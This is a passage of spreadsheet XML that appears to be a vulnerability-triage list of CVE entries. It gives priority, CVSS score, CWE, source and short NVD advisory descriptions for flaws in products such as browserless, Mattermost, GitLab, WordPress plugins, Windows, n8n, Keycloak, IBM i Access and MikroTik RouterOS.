      <c r="Q967" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R967" s="5" t="inlineStr">
        <is>
          <t>browserless versions 1.44.0 through 2.56.7 fail to enforce file protocol restrictions in Playwright websocket endpoints, allowing authenticated token holders to read arbitrary files. Attackers can navigate Playwright-driven browsers to file scheme URLs and access files accessible to the container process despite the ALLOW_FILE_PROTOCOL setting defaulting to false.</t>
        </is>
      </c>
      <c r="S967" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92811</t>
        </is>
      </c>
    </row>
    <row r="968">
      <c r="A968" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B968" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C968" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9812</t>
        </is>
      </c>
      <c r="D968" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E968" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F968" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G968" s="5" t="inlineStr"/>
      <c r="H968" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I968" s="5" t="inlineStr"/>
      <c r="J968" s="5" t="inlineStr"/>
      <c r="K968" s="5" t="inlineStr"/>
      <c r="L968" s="5" t="inlineStr"/>
      <c r="M968" s="5" t="inlineStr"/>
      <c r="N968" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O968" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P968" s="5" t="inlineStr"/>
      <c r="Q968" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R968" s="5" t="inlineStr">
        <is>
          <t>Mattermost versions 11.9.x &lt;= 11.9.0, 11.8.x &lt;= 11.8.4, 11.7.x &lt;= 11.7.7, 10.11.x &lt;= 10.11.22 fail to validate that a property field belongs to the specified run before updating its value which allows an authenticated user with run property-management access to crash the Playbooks plugin via a REST request referencing a property field that belongs to a different run. Mattermost Advisory ID: MMSA-2026-00684</t>
        </is>
      </c>
      <c r="S968" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9812</t>
        </is>
      </c>
    </row>
    <row r="969">
      <c r="A969" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B969" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C969" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-11222</t>
        </is>
      </c>
      <c r="D969" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E969" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F969" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G969" s="5" t="inlineStr"/>
      <c r="H969" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I969" s="5" t="inlineStr"/>
      <c r="J969" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K969" s="5" t="inlineStr"/>
      <c r="L969" s="5" t="inlineStr"/>
      <c r="M969" s="5" t="inlineStr"/>
      <c r="N969" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O969" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P969" s="5" t="inlineStr"/>
      <c r="Q969" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R969" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.0 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that under certain conditions could have allowed a developer user to perform actions in the context of another user's merge request commit due to a race condition issue in pipeline creation.</t>
        </is>
      </c>
      <c r="S969" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-11222</t>
        </is>
      </c>
    </row>
    <row r="970">
      <c r="A970" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B970" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C970" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11996</t>
        </is>
      </c>
      <c r="D970" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E970" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F970" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G970" s="5" t="inlineStr"/>
      <c r="H970" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I970" s="5" t="inlineStr"/>
      <c r="J970" s="5" t="inlineStr"/>
      <c r="K970" s="5" t="inlineStr"/>
      <c r="L970" s="5" t="inlineStr"/>
      <c r="M970" s="5" t="inlineStr"/>
      <c r="N970" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O970" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P970" s="5" t="inlineStr"/>
      <c r="Q970" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R970" s="5" t="inlineStr">
        <is>
          <t>The Advanced Popups plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'Notification Button Link' Field in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="S970" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11996</t>
        </is>
      </c>
    </row>
    <row r="971">
      <c r="A971" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B971" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C971" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16185</t>
        </is>
      </c>
      <c r="D971" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E971" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F971" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G971" s="5" t="inlineStr"/>
      <c r="H971" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I971" s="5" t="inlineStr"/>
      <c r="J971" s="5" t="inlineStr"/>
      <c r="K971" s="5" t="inlineStr"/>
      <c r="L971" s="5" t="inlineStr"/>
      <c r="M971" s="5" t="inlineStr"/>
      <c r="N971" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O971" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P971" s="5" t="inlineStr"/>
      <c r="Q971" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R971" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 could allow a remote attacker to bypass authentication on an admin console servlet.</t>
        </is>
      </c>
      <c r="S971" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16185</t>
        </is>
      </c>
    </row>
    <row r="972">
      <c r="A972" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B972" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C972" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5920</t>
        </is>
      </c>
      <c r="D972" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E972" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F972" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G972" s="5" t="inlineStr"/>
      <c r="H972" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I972" s="5" t="inlineStr"/>
      <c r="J972" s="5" t="inlineStr"/>
      <c r="K972" s="5" t="inlineStr"/>
      <c r="L972" s="5" t="inlineStr"/>
      <c r="M972" s="5" t="inlineStr"/>
      <c r="N972" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O972" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P972" s="5" t="inlineStr"/>
      <c r="Q972" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R972" s="5" t="inlineStr">
        <is>
          <t>The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'shortcode_content' parameter of the bt_bb_shortcode shortcode in all versions up to, and including, 5.9.6. This is due to a bypassable security filter (bt_bb_save_pre) that can be circumvented via null byte injection, combined with insufficient output sanitization of base64-decoded content in the bt_bb_raw_content shortcode handler. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="S972" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5920</t>
        </is>
      </c>
    </row>
    <row r="973">
      <c r="A973" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B973" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C973" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69874</t>
        </is>
      </c>
      <c r="D973" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E973" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F973" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G973" s="5" t="inlineStr"/>
      <c r="H973" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I973" s="5" t="inlineStr"/>
      <c r="J973" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K973" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L973" s="5" t="inlineStr"/>
      <c r="M973" s="5" t="inlineStr"/>
      <c r="N973" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O973" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P973" s="5" t="inlineStr"/>
      <c r="Q973" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R973" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S973" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69874</t>
        </is>
      </c>
    </row>
    <row r="974">
      <c r="A974" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B974" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C974" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77887</t>
        </is>
      </c>
      <c r="D974" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E974" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F974" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G974" s="5" t="inlineStr"/>
      <c r="H974" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I974" s="5" t="inlineStr"/>
      <c r="J974" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K974" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L974" s="5" t="inlineStr"/>
      <c r="M974" s="5" t="inlineStr"/>
      <c r="N974" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O974" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P974" s="5" t="inlineStr"/>
      <c r="Q974" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R974" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S974" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77887</t>
        </is>
      </c>
    </row>
    <row r="975">
      <c r="A975" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B975" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C975" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77891</t>
        </is>
      </c>
      <c r="D975" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E975" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F975" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G975" s="5" t="inlineStr"/>
      <c r="H975" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I975" s="5" t="inlineStr"/>
      <c r="J975" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K975" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L975" s="5" t="inlineStr"/>
      <c r="M975" s="5" t="inlineStr"/>
      <c r="N975" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O975" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P975" s="5" t="inlineStr"/>
      <c r="Q975" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R975" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S975" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77891</t>
        </is>
      </c>
    </row>
    <row r="976">
      <c r="A976" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B976" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C976" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85172</t>
        </is>
      </c>
      <c r="D976" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E976" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F976" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G976" s="5" t="inlineStr"/>
      <c r="H976" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I976" s="5" t="inlineStr"/>
      <c r="J976" s="5" t="inlineStr"/>
      <c r="K976" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L976" s="5" t="inlineStr"/>
      <c r="M976" s="5" t="inlineStr"/>
      <c r="N976" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O976" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P976" s="5" t="inlineStr"/>
      <c r="Q976" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R976" s="5" t="inlineStr">
        <is>
          <t>n8n versions before 2.34.1 contain a server-side request forgery vulnerability in the legacy request helper function exposed to Code and Function nodes. The validation logic checks the uri property for SSRF safety while the underlying HTTP client uses the url property when both are present, allowing attackers to bypass validation by supplying a safe uri alongside a malicious url to access internal addresses.</t>
        </is>
      </c>
      <c r="S976" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85172</t>
        </is>
      </c>
    </row>
    <row r="977">
      <c r="A977" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B977" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C977" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92358</t>
        </is>
      </c>
      <c r="D977" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E977" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F977" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G977" s="5" t="inlineStr"/>
      <c r="H977" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I977" s="5" t="inlineStr"/>
      <c r="J977" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K977" s="5" t="inlineStr"/>
      <c r="L977" s="5" t="inlineStr"/>
      <c r="M977" s="5" t="inlineStr"/>
      <c r="N977" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O977" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P977" s="5" t="inlineStr"/>
      <c r="Q977" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="R977" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the first broker login flow of Keycloak. When a user confirms an account-linking request from a different browser, a temporary proof is created to validate the link. However, this proof is not properly cleared after the link is established or when the user later manually removes the link. An attacker who controls the external identity can exploit this leftover proof to silently re-establish the link and gain unauthorized access to the victims account without any further confirmation.</t>
        </is>
      </c>
      <c r="S977" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92358</t>
        </is>
      </c>
    </row>
    <row r="978">
      <c r="A978" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B978" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C978" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14275</t>
        </is>
      </c>
      <c r="D978" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E978" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F978" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G978" s="5" t="inlineStr"/>
      <c r="H978" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I978" s="5" t="inlineStr"/>
      <c r="J978" s="5" t="inlineStr"/>
      <c r="K978" s="5" t="inlineStr"/>
      <c r="L978" s="5" t="inlineStr"/>
      <c r="M978" s="5" t="inlineStr"/>
      <c r="N978" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O978" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P978" s="5" t="inlineStr"/>
      <c r="Q978" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R978" s="5" t="inlineStr">
        <is>
          <t>IBM i Access Family 1.1.2.0 through 1.1.9.15 IBM i Access Client Solutions could allow an authenticated user to execute arbitrary commands with normal user privileges on the system due to improper validation of user supplied input in a STRPCCMD CL command.</t>
        </is>
      </c>
      <c r="S978" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14275</t>
        </is>
      </c>
    </row>
    <row r="979">
      <c r="A979" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B979" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C979" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14276</t>
        </is>
      </c>
      <c r="D979" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E979" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F979" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G979" s="5" t="inlineStr"/>
      <c r="H979" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I979" s="5" t="inlineStr"/>
      <c r="J979" s="5" t="inlineStr"/>
      <c r="K979" s="5" t="inlineStr"/>
      <c r="L979" s="5" t="inlineStr"/>
      <c r="M979" s="5" t="inlineStr"/>
      <c r="N979" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O979" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P979" s="5" t="inlineStr"/>
      <c r="Q979" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R979" s="5" t="inlineStr">
        <is>
          <t>IBM i Access Family 1.1.2.0 through 1.1.9.15 IBM i Access Client Solutions could allow an authenticated user to execute arbitrary commands with normal user privileges on the system due to improper validation of user supplied input in a malicious emulator macro RunProgram action.</t>
        </is>
      </c>
      <c r="S979" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14276</t>
        </is>
      </c>
    </row>
    <row r="980">
      <c r="A980" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B980" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C980" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14277</t>
        </is>
      </c>
      <c r="D980" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E980" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F980" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G980" s="5" t="inlineStr"/>
      <c r="H980" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I980" s="5" t="inlineStr"/>
      <c r="J980" s="5" t="inlineStr"/>
      <c r="K980" s="5" t="inlineStr"/>
      <c r="L980" s="5" t="inlineStr"/>
      <c r="M980" s="5" t="inlineStr"/>
      <c r="N980" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O980" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P980" s="5" t="inlineStr"/>
      <c r="Q980" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R980" s="5" t="inlineStr">
        <is>
          <t>IBM i Access Family 1.1.2.0 through 1.1.9.15 could allow an authenticated user to execute arbitrary commands with normal user privileges on the system due to improper validation of user supplied input in a session file.</t>
        </is>
      </c>
      <c r="S980" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14277</t>
        </is>
      </c>
    </row>
    <row r="981">
      <c r="A981" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B981" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C981" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18120</t>
        </is>
      </c>
      <c r="D981" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E981" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F981" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G981" s="5" t="inlineStr"/>
      <c r="H981" s="5" t="inlineStr"/>
      <c r="I981" s="5" t="inlineStr"/>
      <c r="J981" s="5" t="inlineStr"/>
      <c r="K981" s="5" t="inlineStr"/>
      <c r="L981" s="5" t="inlineStr"/>
      <c r="M981" s="5" t="inlineStr"/>
      <c r="N981" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O981" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P981" s="5" t="inlineStr"/>
      <c r="Q981" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R981" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS before 9.5.3 exposed a legacy Express entry search endpoint that returned entry result JSON without invoking the canViewExpressEntries() permission check applied by the normal dashboard and CSV Export flow. An unauthenticated visitor who knew or discovered an Express entity identifier could enumerate that entity's entry search results, disclosing attribute values intended to be restricted to privileged users. For Express entities that do not support entry-specific permissions (i.e., supportsEntrySpecificPermissions() returns false), per-entry permission filtering is additionally disabled via EntryList::ignorePermissions(). The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Daniel Powell for reporting.</t>
        </is>
      </c>
      <c r="S981" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18120</t>
        </is>
      </c>
    </row>
    <row r="982">
      <c r="A982" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B982" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C982" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54452</t>
        </is>
      </c>
      <c r="D982" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E982" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F982" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G982" s="5" t="inlineStr"/>
      <c r="H982" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I982" s="5" t="inlineStr"/>
      <c r="J982" s="5" t="inlineStr"/>
      <c r="K982" s="5" t="inlineStr"/>
      <c r="L982" s="5" t="inlineStr"/>
      <c r="M982" s="5" t="inlineStr"/>
      <c r="N982" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O982" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P982" s="5" t="inlineStr"/>
      <c r="Q982" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R982" s="5" t="inlineStr">
        <is>
          <t>safeurl is a server-side request forgery protection library. Prior to 0.2.4, the privateNetworks list in ip.go omits the IPv6 ranges 64:ff9b:1::/48, 5f00::/16, 3fff::/20, and 100:0:0:1::/64. When an application enables IPv6 with EnableIPv6(true), an attacker-controlled destination in one of these ranges is not recognized as non-public and can pass the SSRF destination check, potentially allowing access to resources hosted within the omitted ranges. IPv6 is disabled by default, and configurations that retain EnableIPv6(false) are not exposed to this bypass. This issue is fixed in version 0.2.4.</t>
        </is>
      </c>
      <c r="S982" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54452</t>
        </is>
      </c>
    </row>
    <row r="983">
      <c r="A983" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B983" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C983" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56719</t>
        </is>
      </c>
      <c r="D983" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E983" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F983" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G983" s="5" t="inlineStr"/>
      <c r="H983" s="5" t="inlineStr"/>
      <c r="I983" s="5" t="inlineStr"/>
      <c r="J983" s="5" t="inlineStr"/>
      <c r="K983" s="5" t="inlineStr"/>
      <c r="L983" s="5" t="inlineStr"/>
      <c r="M983" s="5" t="inlineStr"/>
      <c r="N983" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O983" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P983" s="5" t="inlineStr"/>
      <c r="Q983" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R983" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS before 7.24 contains an out-of-bounds read vulnerability in the userspace SMB daemon that allows unauthenticated attackers to read beyond the end of the request buffer by supplying a crafted uniPwdLen field value in a minimal SMB1 SessionSetupAndX frame. The out-of-bounds read occurs in the SessionSetupAndX handler before any credential validation, potentially exposing sensitive memory contents.</t>
        </is>
      </c>
